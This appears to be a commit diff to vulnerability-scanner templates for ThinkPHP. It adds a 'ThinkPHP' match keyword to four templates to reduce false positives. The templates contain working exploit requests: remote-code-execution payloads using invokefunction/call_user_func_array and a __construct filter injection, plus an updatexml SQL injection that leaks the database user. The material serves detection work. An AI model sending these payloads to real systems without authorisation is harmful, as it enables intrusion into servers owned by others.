Added thinkphp keyword from response to avoid false positive

vulnerabilities/thinkphp/thinkphp-2-rce.yaml

@@ -12,13 +12,16 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "PHP Extension"
           - "PHP Version"
+          - "ThinkPHP"
         condition: and
+
       - type: status
         status:
           - 200

vulnerabilities/thinkphp/thinkphp-5022-rce.yaml

@@ -12,13 +12,16 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "PHP Extension"
           - "PHP Version"
+          - "ThinkPHP"
         condition: and
+
       - type: status
         status:
           - 200

vulnerabilities/thinkphp/thinkphp-5023-rce.yaml

@@ -12,16 +12,21 @@ requests:
   - method: POST
     path:
       - "{{BaseURL}}/index.php?s=captcha"
+
     headers:
       Content-Type: application/x-www-form-urlencoded
+
     body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "PHP Extension"
           - "PHP Version"
+          - "ThinkPHP"
         condition: and
+
       - type: status
         status:
           - 200

vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml

@@ -12,13 +12,15 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
+
     matchers-condition: and
     matchers:
       - type: word
+        condition: and
         words:
           - "SQLSTATE"
           - "XPATH syntax error"
-        condition: and
+
       - type: status
         status:
           - 500